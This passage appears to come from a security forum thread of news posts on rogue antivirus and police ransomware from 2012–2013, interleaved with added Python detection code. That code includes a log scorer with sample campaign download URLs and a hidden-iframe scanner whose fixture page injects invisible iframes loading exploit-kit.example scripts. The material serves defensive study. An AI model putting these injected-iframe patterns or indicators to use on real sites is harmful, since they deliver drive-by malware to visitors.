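SAMPLE_LOG = """\
1340100001.123 10.0.0.5 204.152.214.17 GET http://fail-safetytestingcontrol.in/fc1a9d5408b7e17d/setup.exe
1340100002.456 10.0.0.7 93.184.216.34 GET http://example.com/downloads/setup.exe
1340100003.789 10.0.0.9 204.152.214.40 GET http://vulnerabilityqueerprocessbrittleness.in/0123456789abcdef/setup.zip
1340100004.001 10.0.0.5 198.51.100.8 GET http://cdn.example.org/8a7b6c5d4e3f2a1b/setup.exe
1340100005.002 10.0.0.7 204.152.214.17 GET http://fail-safetytestingcontrol.in/
"""


def score(line):
    """Score one log line; returns the signals that fired and a verdict."""
    try:
        _ts, client, dst, _method, url = line.split()
    except ValueError:
        raise ValueError("unexpected log layout: %r" % line)
    parsed = urlparse(url)
    signals = []
    if FAKEAV_PATH.match(parsed.path):
        signals.append("path")
    if ipaddress.ip_address(dst) in FAKEAV_NET:
        signals.append("net")
    if parsed.hostname and parsed.hostname.endswith(FAKEAV_TLD):
        signals.append("tld")
    # Two strong signals together are the campaign's known fingerprint;
    # either one alone is worth a look but not an automatic block.
    if "path" in signals and "net" in signals:
        verdict = "fakeav-download"
    elif "path" in signals or "net" in signals:
        verdict = "suspect"
    else:
        verdict = "clean"
    return {"client": client, "url": url, "signals": signals, "verdict": verdict}


def scan(log_text):
    """Score every non-empty line of a log dump."""
    return [score(line) for line in log_text.splitlines() if line.strip()]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        if hit["verdict"] != "clean":
            print(hit["verdict"], hit["client"], hit["url"], hit["signals"])
```

The diary itself warns that the infrastructure "keeps moving around", so the address-range indicator decays within days; the path shape is the part worth keeping in a rule, and the fourth sample line (right path shape, unrelated host) shows why it should raise a "suspect" rather than a hard block.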


#25 AplusWebMaster


Posted 20 September 2012 - 01:11 PM

FYI...

Ransomware-as-a-Service spotted in the wild
- http://blog.webroot....ed-in-the-wild/
Sep 20, 2012 - "... recently advertised DIY (do-it-yourself) managed voucher-based Police Ransomware service exclusively targeting European users...
Sample underground forum advertisement of the managed DIY Police Ransomware service:
> https://webrootblog....ice_managed.png
According to the advertisement, the actual malicious executable is both x32 and x64 compatible, successfully blocking system keys and other attempts to kill the malicious application. The cybercriminals behind the managed service have already managed to localize their templates in the languages of 13 prospective European countries such as Switzerland, Greece, France, Sweden, Netherlands, Italy, Poland, Belgium, Portugal, Finland, Spain, Germany, and Austria...
Sample screenshot of the DIY managed Ransomware-as-a-service command and control interface:
> https://webrootblog...._managed_01.png
... thousands of users are being successfully infected with the ransomware variants, with the command and control service capable of displaying statistics for the affected countries, and the operating system in use by the affected parties.
Second sample screenshot of the DIY managed Ransomware-as-a-service command and control interface:
> https://webrootblog...._managed_02.png
The managed service relies primarily on the Ukash voucher-based payment system*, and the command and control interface conveniently displays the voucher codes and their monetary value, allowing the users of the service an easy way to claim the money from the vouchers..."
* http://en.wikipedia.org/wiki/Ukash
___

- http://atlas.arbor.n...ndex#-685203363
Severity: Elevated Severity
Sep 21, 2012
Ransomware, which can be quite destructive - is being sold as a service in the underground economy.
Analysis: Ransomware can sometimes be cleaned from a system, however if it is done properly by the criminals, victims of the infection will need to rely on backups to recover from having their files encrypted...


Edited by AplusWebMaster, 22 September 2012 - 08:09 PM.



#26 AplusWebMaster


Posted 02 October 2012 - 04:25 PM

FYI...

"Scareware" Marketer FTC Case Results in $163 Million Judgment ...
- http://www.ftc.gov/o...0/winfixer.shtm
10/02/2012 - "At the Federal Trade Commission’s request, a federal court imposed a judgment of more than $163 million on the final defendant in the FTC’s case against an operation that used computer “scareware” to trick consumers into thinking their computers were infected with malicious software, and then sold them software to “fix” their non-existent problem. The court order also permanently prohibits the defendant, Kristy Ross, from selling computer security software and any other software that interferes with consumers’ computer use, and from any form of deceptive marketing.
In 2008, as part of the FTC’s efforts to protect consumers from spyware and malware, the FTC charged Ross and six other defendants with conning more than one million consumers into buying software to remove malware supposedly detected by computer scans. The FTC charged that the operation used elaborate and technologically sophisticated Internet advertisements placed with advertising networks and many popular commercial websites. These ads displayed to consumers a “system scan” that invariably detected a host of malicious or otherwise dangerous files and programs on consumers’ computers. The bogus “scans” would then urge consumers to buy the defendants’ software for $40 to $60 to clean off the malware.
The U.S. District Court for the District of Maryland subsequently ordered a halt to the massive scheme, pending litigation. Under a settlement announced in 2011, defendant Marc D’Souza and his father, Maurice D’Souza, were ordered to give up $8.2 million in ill-gotten gains. Two other defendants previously settled the charges against them; the FTC obtained default judgments against three other defendants..."
* http://www.ftc.gov/o...ixeropinion.pdf



#27 AplusWebMaster


Posted 31 October 2012 - 08:34 PM

FYI...

Rogue AV for Windows 8
- http://blog.trendmic...ging-windows-8/
31 Oct 2012 - "... cybercriminals are grabbing this chance to distribute threats leveraging Windows 8 and raise terror among users – just in time for Halloween. We were alerted to two threats that leverage the release of this new OS. The first one is a typical FAKEAV. Detected as TROJ_FAKEAV.EHM, this malware may be encountered when users visit malicious sites...
> http://blog.trendmic...nningresult.jpg
... the malware displays a fake scanning result to intimidate users to purchase the fake antivirus program – just like your run-of-the-mill FAKEAV variant. What is different with this malware, however, is that it is packaged as a security program made for Windows 8.
> http://blog.trendmic...AV_Windows8.jpg
The other threat is a phishing email that entices users to visit a website where they can download Windows 8 for free. Instead of a free OS, they are led to a phishing site that asks for personally identifiable information (PII) like email address, password, name that can be peddled in the underground market or used for other cybercriminal activities.
> http://blog.trendmic...il_Windows8.jpg
It is typical for cybercriminals to piggyback on the highly-anticipated release of any latest technology to take their malware, spam, malicious app to new heights... To stay safe, users must keep their cool and think twice before clicking links or visiting webpages, especially those that promise the latest items or programs for free. If it’s too good to be true – it probably is..."


Edited by AplusWebMaster, 01 November 2012 - 04:45 AM.



#28 AplusWebMaster


Posted 18 November 2012 - 03:02 PM

FYI...

Win 8 not immune to Ransomware
- http://www.symantec....mune-ransomware
Updated: 13 Nov 2012 - "... Symantec ran several prevalent ransomware samples currently found in the wild in a default Windows 8 environment. While some samples ran poorly on Windows 8, it did not take long to find a ransomware variant (Trojan.Ransomlock.U*) that successfully locked a Windows 8 system, effectively holding it to ransom.
Figure. Ransomware-locked Windows 8 system
> https://www.symantec...mageW1-blog.jpg
The Trojan.Ransomlock.U* variant uses the geolocation of the compromised system to serve localized ransomware screens in the appropriate language. While the ransomware running on Windows 8 correctly identified our location, the cybercriminals in this case must not have realized that English is the main language spoken in Ireland (less than 15 percent of the population is actually able to read Irish language). Their ingenuity in this case has lowered the chance of the ransom attempt being successful. As more users adopt Windows 8, Symantec expects to see more malware targeting this new environment...
> http://www.symantec....wing-menace.pdf
PDF Pg.4 - "... Fake police ransomware can be installed on a computer in a few ways but the most common to date has been through Web exploits and drive-by downloads. Drive-by download is a term used to describe how a piece of malware is installed on a user’s computer without their knowledge when that user browses to a compromised website. The download occurs in the background and is invisible to the user. In a typical drive-by download, the user browses to a website... The attacker has inserted a hidden iFrame — a special redirect — into this website. This redirection causes the user’s browser to actually connect to a second website containing an exploit pack. Exploit packs contain multiple different exploits, which, if the computer is not fully patched, causes the browser to download a file (the malware)..."
* http://www.symantec....-100315-1353-99

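The Symantec PDF quoted above describes the usual delivery path for police ransomware: a hidden iframe injected into a legitimate page silently pulls in an exploit pack. As an added example, not from Symantec or from this post, here is a small scanner that flags iframes a visitor would never see in the rendered page (zero-size, CSS-hidden, or pushed offscreen). The sample page, the "exploit-kit.example" hostnames and the heuristics' thresholds are constructed for the example.

```python
import re
from html.parser import HTMLParser


def _tiny(value):
    """True for width/height attributes of 0 or 1 (optionally suffixed px)."""
    if value is None:
        return False
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value.lower())
    return m is not None and int(m.group(1)) <= 1


class HiddenIframeFinder(HTMLParser):
    """Collects iframes with attributes or inline CSS that keep them invisible."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        reasons = []
        # 0x0 / 1x1 frames: the classic drive-by injection footprint
        if _tiny(a.get("width")) or _tiny(a.get("height")):
            reasons.append("zero-size")
        style = re.sub(r"\s+", "", (a.get("style") or "").lower())
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        if (re.search(r"(?:^|;)(?:width|height):0(?:px)?(?:;|$)", style)
                and "zero-size" not in reasons):
            reasons.append("zero-size")
        # absolute positioning far outside the viewport
        if re.search(r"(?:left|top):-\d{3,}", style):
            reasons.append("offscreen")
        if reasons:
            self.findings.append({"src": a.get("src"), "reasons": reasons})


def find_hidden_iframes(html):
    """Return a list of {'src', 'reasons'} dicts for every hidden iframe."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed page: one legitimate video embed plus two injected frames.
SAMPLE_HTML = """\
<html><body>
<h1>Daily news</h1>
<iframe src="http://videos.example.com/embed/123" width="640" height="360"></iframe>
<iframe src="http://exploit-kit.example/in.php" width="0" height="0"
        style="visibility: hidden"></iframe>
<p>story text</p>
<iframe src="http://exploit-kit.example/gate.php?id=7" width=1 height=1
        style="position:absolute; left:-9999px"></iframe>
</body></html>
"""


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML):
        print(hit["src"], ",".join(hit["reasons"]))
```

This only sees what is literally in the served HTML. Injected redirectors are frequently emitted by obfuscated JavaScript at runtime, so for real triage run the same check against the DOM of a headless browser after page load, and walk the parent chain, since a visible iframe inside a hidden div is hidden too.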


#29 AplusWebMaster


Posted 22 November 2012 - 11:48 PM

FYI...

Police Ransomware bears Fake Digital Signature
- http://blog.trendmic...ital-signature/
Nov 22, 2012 - "... We encountered two samples bearing the same fake digital signature, which Trend Micro detects as TROJ_RANSOM.DDR... the digital signature’s name and its issuing provider are very suspicious... the fake signature’s sole purpose is likely to elude digisig checks. Users may encounter these files by visiting malicious sites or sites exploiting a Java vulnerability... Once executed, TROJ_RANSOM.DDR holds the system “captive” and prevents users from accessing it. It then displays a warning message to scare its victims into paying a fee. To intimidate users further, this warning message often spoofs law enforcement agencies like the FBI, often claiming that they caught users doing something illegal (or naughty) over the Internet. Based on our analysis, the two samples we found impersonate two different law enforcement agencies. The first sample mimics the FBI...
> http://blog.trendmic..._ransomware.gif
... while the second one displays a warning message purportedly from the UK’s Police Central e-Crime Unit.
> http://blog.trendmic..._ransomware.gif
First seen in Russia in 2005, ransomware has since spread to other European countries and eventually, to the United States and Canada. These variants are known to extort money by taking control of systems and taunting users to pay for a fee (or “ransom”) thru selected payment methods. The most recent wave of these variants were found capable of tracking victims’ geographic locations. This tracking enables the attackers to craft variants that impersonate the victim’s local police/law enforcement agencies while holding their entire systems captive. Software vendors include digital signatures as a way for users to verify software/program legitimacy. But cybercriminals may incorporate expired or fake digital sigs or certificates into the malware to hoodwink users into executing it. Just last October, Adobe warned users of malicious utilities carrying Adobe-issued certificates. Certain targeted attacks like the notorious FLAME were also found to use malicious file components bearing certificates issued by Microsoft..."
___

- https://www.net-secu...ews.php?id=2331
23.11.2012


Edited by AplusWebMaster, 24 November 2012 - 08:23 AM.



#30 AplusWebMaster


Posted 06 December 2012 - 07:44 AM

FYI...

Finnish website attack via Rogue Ad
- http://www.f-secure....s/00002468.html
Dec 5, 2012 - "... every so often, something "big" will occur in such a way that Finland becomes a kind of statistical laboratory... An advertising network used by one of Finland's most popular websites, suomi24.fi, was compromised during the December time period... all of that malware traffic was pushed by a -single- ad from a third-party advertiser's network. Just one ad... What was blocked? — Rogue Antivirus. As in fake security software...
> http://www.f-secure...._Rogue_Scan.png
These rogue programs aren't actually scanning your computer for threats, but still, they're more than happy to charge for their services. Rogues don't offer any free trials, they want payment up front... That's generally a good sign there's something amiss."

Rogue Yahoo! Messenger ...
- http://blog.trendmic...test-ym-update/
Dec 5, 2012 - "On the heels of Yahoo!’s recent announcement of upcoming updates for the Messenger platform*, certain bad guys are already taking this chance to release their own, malicious versions of Yahoo! Messenger... I encountered this particular file (detected by Trend Micro as TROJ_ADCLICK.TNH), which looks like a legitimate Yahoo! Messenger executable.
> http://blog.trendmic...senger_fake.gif
However, when I checked its file properties, I found that it is actually an AutoIt compiled file.
> http://blog.trendmic...YM_property.gif
Once users download and execute this file, which is saved as C:\Program Files\Yahoo Messenger.exe, the malware checks if an Internet connection is available by pinging Google. If it returns any value not equal to 0, it proceeds to checking the user’s existing Internet browser(s). Once a browser is found, it connects to the websites http ://{BLOCKED}y/2JiIW and http ://31c3f4bd.{BLOCKED}cks .com, as seen below:
> http://blog.trendmic...ites_fakeym.gif
... this threat doesn’t stop there... these sites further redirect users to other webpages. Some of these pages even result in several, almost endless redirections. From the looks of it, this scheme looks like classic click fraud. By connecting to these sites, which are pay-per-click sites, the malware generates a “visit” that translates into profit for the site owners and/or the malware author... the people behind this threat are attempting to piggyback on Yahoo!’s recent announcement to reach out to as many users as possible. Unfortunately, this social engineering tactic has been proven effective, such as in the case of fake keygen applications for Windows 8 and malicious versions of Bad Piggies. To stay safe from these threats, users must be cautious when visiting sites or downloading files from the Internet. For better protection, users should bookmark trusted sites and refrain from visiting unknown pages. Cybercriminals and other bad guys on the Internet are good at crafting their schemes to make them more appealing to ordinary users... it pays to know more about social engineering tactics and what makes them work..."
* http://www.ymessenge...senger-features


Edited by AplusWebMaster, 06 December 2012 - 07:47 AM.

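Two of the posts above come down to the same triage question about a dropped executable: the Trend Micro ransomware write-up (TROJ_RANSOM.DDR) shows a fake digital signature bolted on to "elude digisig checks", and the fake Yahoo! Messenger post notes that the file properties revealed an AutoIt-compiled binary. The following is an added example, not code from Trend Micro or from this thread, that parses a PE file far enough to say whether an Authenticode certificate table is present at all, and scans for the script magic that compiled AutoIt binaries carry. The PE field offsets are from the PE/COFF specification; the "AU3!EA06"/"AU3!EA05" marker is the well-known AutoIt script-resource magic; the synthetic PE builder is a test fixture constructed for the example and is not a runnable executable.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4           # data-directory slot of the certificate table
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002      # bCertificate holds PKCS#7 SignedData
AUTOIT_MARKERS = (b"AU3!EA06", b"AU3!EA05")  # magic at the start of a compiled AutoIt script


def _optional_header(data):
    """Validate MZ/PE headers and return (offset, size, magic) of the optional header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER, 20 bytes
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    return opt, opt_size, magic


def find_authenticode(data):
    """Locate the embedded Authenticode blob; None if the file has no signature table.

    Presence of a blob says nothing about who signed it or whether the chain
    verifies; that is exactly the gap a fake or self-signed certificate exploits.
    """
    opt, opt_size, magic = _optional_header(data)
    if magic == 0x10B:        # PE32
        num_dirs_off, dirs_off = 92, 96
    elif magic == 0x20B:      # PE32+
        num_dirs_off, dirs_off = 108, 112
    else:
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    num_dirs = struct.unpack_from("<I", data, opt + num_dirs_off)[0]
    entry = opt + dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    if num_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY or entry + 8 > opt + opt_size:
        return None
    # Unlike the other directories, this one stores a raw file offset, not an RVA.
    cert_off, cert_size = struct.unpack_from("<II", data, entry)
    if cert_off == 0 or cert_size == 0:
        return None
    if cert_size < 8 or cert_off + cert_size > len(data):
        raise ValueError("certificate table points outside the file")
    _length, revision, cert_type = struct.unpack_from("<IHH", data, cert_off)
    return {"offset": cert_off, "size": cert_size, "revision": revision,
            "type": cert_type, "pkcs7": cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA}


def looks_like_autoit(data):
    """True if the compiled-AutoIt script magic appears anywhere in the file."""
    return any(marker in data for marker in AUTOIT_MARKERS)


def triage(data):
    """One-line summary for a suspicious dropped executable."""
    cert = find_authenticode(data)
    return {"has_signature_blob": cert is not None,
            "blob_is_pkcs7": bool(cert and cert["pkcs7"]),
            "autoit_compiled": looks_like_autoit(data)}


def build_synthetic_pe(signed=False, autoit=False):
    """Constructed minimal PE32 header for testing; not an executable."""
    opt_size = 96 + 8 * 16                                  # fixed part + 16 directories
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                   # Magic = PE32
    struct.pack_into("<I", opt, 92, 16)                     # NumberOfRvaAndSizes
    image = bytearray(dos + b"PE\0\0" + coff + bytes(opt))
    if signed:
        blob = b"\x30\x82" + b"\0" * 30                     # stand-in for PKCS#7 bytes
        cert = struct.pack("<IHH", 8 + len(blob), 0x0200,
                           WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        entry = 0x40 + 4 + 20 + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
        struct.pack_into("<II", image, entry, len(image), len(cert))
        image += cert
    if autoit:
        image += b"\0" * 16 + AUTOIT_MARKERS[0]             # overlay with the script magic
    return bytes(image)


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        print(triage(fh.read()))
```

Treat "has_signature_blob: True" as a prompt for the real check, not as a verdict: run `signtool verify /pa /v file.exe` or PowerShell's `Get-AuthenticodeSignature` and look at the chain and the `Status` field, which is where a fake or expired certificate fails. The reverse also holds: a file with no embedded blob can still be legitimately catalog-signed on Windows, so absence is not proof of tampering either.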


#31 AplusWebMaster


Posted 10 December 2012 - 08:06 AM

FYI...

Ransomware speaks...
- http://blog.trendmic...ware-it-speaks/
Dec 10, 2012 - "... we received a report that a new police Trojan variant even has a “voice”. Detected as TROJ_REVETON.HM*, it locks the infected system but instead of just showing a message, it now urges users to pay verbally. The user won’t need a translator to understand what the malware is saying – it speaks the language of the country where the victim is located...
> http://blog.trendmic.../12/LockNew.jpg
... ransomware has now leaped to other European countries, the United States and Canada. Because of the payment method ransomware employs, specifically electronic cash like Ukash, PaySafeCard and MoneyPak, the people behind this threat generate profit from it but with the benefit of having a faint money trail. Because of this, the gangs profiting from this malware can hide their tracks easily..."
* http://about-threats...TROJ_REVETON.HM



#32 AplusWebMaster


Posted 11 January 2013 - 08:47 AM

FYI...

Rogue v ransomware - Fear and deception
- https://blogs.techne...Redirected=true
9 Jan 2013 - "... Rogues are a prime example of malware that uses fear appeals to force your hand. A common scenario you might face when encountering a rogue on your computer follows:
• You see a scanning interface on your screen, pretending to scan the file system (the scanning interface may appear while browsing the Internet or could be inadvertently downloaded).
• Upon completion of the scan, a large number of infections are reportedly found on your computer.
> https://www.microsof...roguevran/1.jpg
• A barrage of warnings related to these supposed infections are intermittently displayed to you in the form of dialog boxes and alerts popping up on your desktop or coming from your taskbar.
• Attempts to launch applications are thwarted by the rogue which blocks the applications from being launched and displays an alert, warning that the application is also infected.
• System security and firewall applications are usually targeted by the rogue as it attempts to terminate their processes, services and/or modify their registry entries, making it extremely difficult to remove the rogue from the computer.
... there is a point to all of these invasive and fear mongering tactics deployed by rogues, which is ultimately to force you to pay a fee using your credit card in order to "activate" the supposed security scanner and remove the reported infections. Rogue:Win32/Winwebsec, a rogue still in circulation and being actively updated by its creators, is an example of a rogue that contains all of these functionalities. Win32/Winwebsec, along with Win32/FakeRean, are two rogues that are still actively out in the wild, but on the whole, we have seen a steady decrease in the number of rogues in circulation in 2012.
> https://www.microsof...roguevran/2.jpg
... numbers broken down by family for most of 2012:
> https://www.microsof...roguevran/3.jpg
... rogues aren’t the only badware in town using fear appeals. In the last year, we’ve seen the rise of a new threat whose success also relies on persuading affected users to act on the receipt of a deceptive message in order to avoid an unpleasant consequence. This new(ish) badware goes by the unfortunate name of ransomware... You can find detailed information on ransomware here*..."
* http://www.microsoft...ransomware.aspx
 



#33 AplusWebMaster


Posted 16 January 2013 - 01:23 PM

FYI...

Ransomware - fear and deception (part 2)
- https://blogs.techne...Redirected=true
15 Jan 2013 - "Ransomware’s approach is aggressive. It uses fear to motivate an affected user to pay a fee (usually not with a credit card but using another payment system – Green Dot Moneypak, Ukash, and others). It generally uses only one deceptive message and is quite specific: you receive a message, supposedly from the police or some other law-enforcement agency accusing you of committing some form of crime. Commonly, these messages accuse the receiver of crimes associated with copyright violations (for example, downloading pirated software or other digital intellectual property) and/or the possession of illicit pornographic material. And if this threat isn’t enough, it backs the message up by rendering the system unusable, presumably until the fine is paid...
> https://www.microsof...roguevran/4.jpg
... they are on the increase.
> https://www.microsof...roguevran/5.jpg
We’ve also seen an increasing number of different types of malware that use this tactic. What started as a fairly small number of families has blossomed during 2012 into an increasingly diverse group (although I will mention that this data has been affected by our increasing focus on this type of malware and our ability to identify them correctly). Reveton and Weelsof, for example, are families that have caused considerable pain to the user.
> https://www.microsof...roguevran/6.jpg
... while rogues still account for a lion’s share of total malware in comparison to ransomware, rogues are trending down while ransomware is on the up:
> https://www.microsof...roguevran/7.jpg
... some more recent rogues have started using similar tactics to ransomware. One FakeRean variant that calls itself Privacy Protection displays fake scan results that imply child pornography has been found on the affected computer.
> https://www.microsof...roguevran/8.jpg
... Legitimate security companies won’t try to scare you into using their scanners and law enforcement agencies aren’t going to pop up a message and scare you into paying a fine. If a message tries to frighten you, think very carefully about what it’s asking you to do, and more importantly, if it’s an unreasonable request (such as sending money), don’t do it."



#34 AplusWebMaster


Posted 13 February 2013 - 04:47 PM

FYI...

Police arrest Ransomware cybercriminals
- http://blog.trendmic...ivity-nabbed-2/
Feb 13, 2013 - "... Trend Micro threat researchers have been studying this scam throughout 2012 and have collaborated very closely with law enforcement authorities in several European countries, especially in Spain. Today, we are very happy to report that the Spanish Police has put the information to good use, and they have just announced in a press conference the arrest of one of the head members of the cybercriminal gang that produces the Ransomware strain known as REVETON. The apparent arrest of this cybercriminal of Russian origin occurred in Dubai, United Arab Emirates. The law enforcement authorities are working to extradite him to Spain for prosecution. Along with his arrest, the operation included the arrests of 10 other individuals tied to the money laundering component of the gang’s operations, which managed the monetization of the PaySafeCard/UKash vouchers received as payment in the scam. The gang apparently had a branch in Spain that exchanged these vouchers and converted them into actual money, which would then be transferred to the leaders of the gang in Russia..."

- http://news.yahoo.co...-201859529.html
Feb 13, 2013 - "... The gang, operating from the Mediterranean resort cities of Benalmadena and Torremolinos, made at least €1 million ($1.35 million) annually... The 27-year-old Russian alleged to be the gang's founder and virus developer was detained in the United Arab Emirates at the request of Spanish police while on vacation and an extradition petition is pending, Martinez said. Six more Russians, two Ukrainians and two Georgians were arrested in Spain last week... Money was also stolen from the victims' accounts via ATMs in Spain, and the gang made daily international money transfers through currency exchanges and call centers to send the funds stolen to Russia. Spanish authorities identified more than 1,200 victims but said the actual number could be much higher. The government's Office of Internet Security received 784,000 visits for advice on how to get rid of the virus. Those arrested face charges of money laundering, participation in a criminal operation and fraud."

- http://h-online.com/-1803788
14 Feb 2013
 



Edited by AplusWebMaster, 14 February 2013 - 01:03 PM.



#35 AplusWebMaster


Posted 22 March 2013 - 09:51 AM

FYI...

DHS-themed Ransomware in the wild
- https://www.us-cert....emed-Ransomware
Last revised: March 22, 2013 - "US-CERT has received reports of apparently DHS-themed ransomware occurring in the wild. Users who are being targeted by the ransomware receive an email message claiming that use of their computer has been suspended and that the user must pay a fine to unblock it. The ransomware -falsely- claims to be from the U.S. Department of Homeland Security and the National Cyber Security Division. Users who are infected with the malware should consult with a reputable security expert to assist in removing the malware... US-CERT and DHS encourage users and administrators to use caution when encountering these types of email messages..."

Screenshot: http://news.softpedi...nsomware-2.jpg/
March 21, 2013

- http://www.reuters.c...E92K0Z920130321
Mar 21, 2013
 

:grrr: :ph34r:


Edited by AplusWebMaster, 22 March 2013 - 10:34 AM.



#36 AplusWebMaster

Posted 03 April 2013 - 09:47 AM

FYI...

Ransomware leverages victims' browser histories for increased credibility
- https://www.computer...sed_credibility
April 1, 2013 - "... A new ransomware variant that employs this trick was spotted over the weekend by an independent malware analyst known online as Kafeine. Dubbed Kovter, this version stands out because it uses information gathered from the victim's browser history in order to make the scam message more credible, Kafeine said Friday in a blog post*. Kovter displays a fake warning allegedly from the U.S. Department of Justice, the U.S. Department of Homeland Security and the FBI, that claims the victim's computer was used to download and distribute illegal content. The message also lists the computer's IP address, its host name and a website from which the illegal material was allegedly downloaded. The malware checks if any of the sites already present in the computer's browser history is present in a remote list of porn sites whose content is not necessarily illegal, and if there's a match, it displays it in the message. By using this technique and naming a site that the victim has actually visited as the source for the alleged illegal content, the ransomware authors attempt to increase the credibility of their message. If no match is found when checking the browser history against the remote list, the malware will just use a random porn site in the message... The authors of police-themed ransomware are constantly trying to improve their success rate and this is just the latest in a long series of tricks they have added. Some variants are actually using the computer's webcam, if one is present, to take a picture of the user and include it in the message in order to give the impression that the authorities are recording the user. Another variant gives victims a deadline of 48 hours to pay the made-up fine before their computer drive is reformatted and their data is destroyed. The average number of daily infection attempts with police-themed ransomware has doubled during the first months of 2013..."
*Screenshot:  https://d1piko3ylsjh...e_kovter_01.png
 

:grrr: :ph34r:




#37 AplusWebMaster

Posted 18 May 2013 - 06:59 AM

FYI...

Ransomware - Reveton.B...
- https://www.net-secu...ews.php?id=2497
May 17, 2013 - "... Microsoft researchers are warning about a new variant of the well-known Reveton ransomware doing rounds. It is being delivered on the victims' computer via the Blackhole exploit kit, and on the surface acts like it always did: locks the computer screen and demands money to unlock it:
> https://www.net-secu...on-17052013.jpg
... in the background, the malware downloads a password-stealer component from its C&C server and runs it. "PWS:Win32/Reveton.B can steal passwords for a comprehensive selection of file downloaders, remote control applications, FTP, poker, chat and e-mail clients, as well as passwords stored by browsers and in protected storage," say* the researchers. "However, as it can load almost any DLL served by the C&C on the fly, this might change." Keeping your OS and software updated should minimize the possibility of being faced with malware, they say, but in case you do get hit by a Reveton infection, it's a good idea to change all your passwords once you remove the malware from the computer."
* http://blogs.technet...ll-pay-off.aspx
 

:( :ph34r:




#38 AplusWebMaster

Posted 27 June 2013 - 11:15 AM

FYI...

Top 5 Fake Security Rogues of 2013
- http://blog.webroot....rogues-of-2013/
June 27, 2013 - "We see users on the internet getting infected with Rogue Security Malware all the time. In fact, it’s one of the most common and obvious types of infections we see. The Rogues lock-down your computer and prevent you from opening any applications so you’re forced to read their scam. Although they use various tactics and convincing GUIs to get onto your computer, they all share a common goal: To get your money.
Here are the top 5 rogues reported this year (Screenshots):
System Care Antivirus: https://webrootblog....virus.jpg?w=750
Internet Security: https://webrootblog....urity.png?w=736
Disk Antivirus Professional: https://webrootblog....virus.png?w=752
System Doctor 2014: https://webrootblog....-2014.jpg?w=801
AVASoft professional antivirus: https://webrootblog....virus.jpg?w=796
... The most common install from fake Adobe update installers and malicious URLs linked from pictures that look like this:
1) https://webrootblog....jpg?w=296&h=145
2) https://webrootblog....jpg?w=560&h=145
Once you click on images like this in the wild and receive the payload from the malicious URLs, you’ll have effectively given permission and installed the Rogue onto your computer.
> https://webrootblog....enter.jpg?w=869
Don’t give them your credit card information.
... New variants of these rogues come out constantly so there are millions of unique signatures being dropped on computers everyday..."

- https://blogs.techne...Redirected=true
27 Jun 2013
 

:grrr: :ph34r: :grrr:


Edited by AplusWebMaster, 06 July 2013 - 06:59 AM.



#39 AplusWebMaster

Posted 17 July 2013 - 09:17 AM

FYI...

Ransomware targets Apple Mac OS X users
- http://blog.malwareb...mac-os-x-users/
July 15, 2013 - "... Cyber-criminals, well known for not re-inventing the wheel, have ‘ported’ the latest ransomware to OS X, not by using some complicated exploit but rather leveraging the browser and its ‘restore from crash’ feature.
Screenshot: http://cdn.blog.malw...ransomware1.png
The ransomware page is being pushed onto unsuspecting users browsing regular sites but in particular when searching for popular keywords. Warnings appearing to be from the FBI tell the victim: “you have been viewing or distributing prohibited Pornographic content.. To unlock your computer and to avoid other legal consequences, you are obligated to pay a release fee of $300.” A quick look at the address bar shows an interesting URL: fbi.gov.id657546456-3999456674.k8381 . com, the bad guys are clearly trying to fool users. If you choose to ignore the message (which you should), you cannot get rid of the page:
> http://cdn.blog.malw...13/07/lock1.png
If you “force quit” the application, the same ransomware page will come back the next time you restart Safari because of the “restore from crash” feature, which loads back the last URL visited before the browser was quit unexpectedly. Talk about a vicious circle... There -is- a way to get rid of it (without clicking on the prompt 150 times) and more importantly without paying the $300 ransom. Click on the Safari menu and then choose “Reset Safari”:
> http://cdn.blog.malw...13/07/reset.png
Make sure all items are marked and hit the Reset button:
> http://cdn.blog.malw...3/07/reset2.png
You can bet many people are going to fall for this scam and pay the ransom money, filling the bad guys’ pockets. Whenever alarming messages are displayed, it is important to take the time to review them, call a friend or talk to someone about it. The bad guys know how to use social engineering to entice victims as, for example, I was led to this locked page by doing a search for Taylor Swift on Bing images. The victim will feel they may have actually been doing something wrong and got caught and, ashamed, will pay the “fine.” This scam is unfortunately all too efficient and is not going away anytime soon. Watch this tutorial* on how to get rid of the FBI ransomware for OS X..."
*
___

- https://www.ic3.gov/...3/130718-2.aspx
July 18, 2013
 

:ph34r: :ph34r:


Edited by AplusWebMaster, 19 July 2013 - 07:37 AM.


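Added example, not part of the Malwarebytes post or this thread: the lure above works because the hostname *begins* with "fbi.gov" while the part a browser actually resolves against is an unrelated ".com". The check below extracts the registrable domain (the label just left of the public suffix) and compares it with the domain the page claims to be, so a leading "fbi.gov." label is reported as a lookalike rather than as genuine. The suffix list is a tiny constructed subset of the Public Suffix List (an assumption so the block runs offline; a real deployment loads the full list from publicsuffix.org), and the sample URL is the post's defanged hostname with the spaces removed.

```python
"""Added example: tell a genuine hostname from a leading-label lookalike.

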